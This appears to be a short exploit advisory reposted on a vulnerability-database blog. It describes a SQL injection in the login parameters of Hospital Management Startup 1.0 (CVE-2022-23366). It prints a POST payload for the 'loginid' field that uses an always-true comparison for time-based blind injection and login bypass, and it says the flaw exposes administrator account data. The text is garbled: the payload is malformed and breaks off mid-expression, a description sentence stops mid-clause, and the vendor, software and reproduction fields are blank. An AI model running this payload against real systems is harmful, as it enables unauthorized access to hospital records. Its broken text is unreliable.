Wednesday, March 9, 2022

Hospital Management Startup 1.0 - 'loginid' SQLi

# Exploit Title: Hospital Management Startup 1.0 - 'loginid' SQLi
# Exploit Author: nu11secur1ty
# Date: 02.10.2022
# Vendor:
# Software:
# CVE-2022-23366

# Description:
The loginid and password parameters from Hospital Management Startup
1.0 appear to be vulnerable to SQL injection attacks.
The attacker can retrieve all information from the administrator
account of the system and he can use the information for malicious
WARNING: If this is in some external domain, or some subdomain, or
internal, this will be extremely dangerous!


[+] Payloads:

Parameter: loginid (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND

# Reproduce:

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore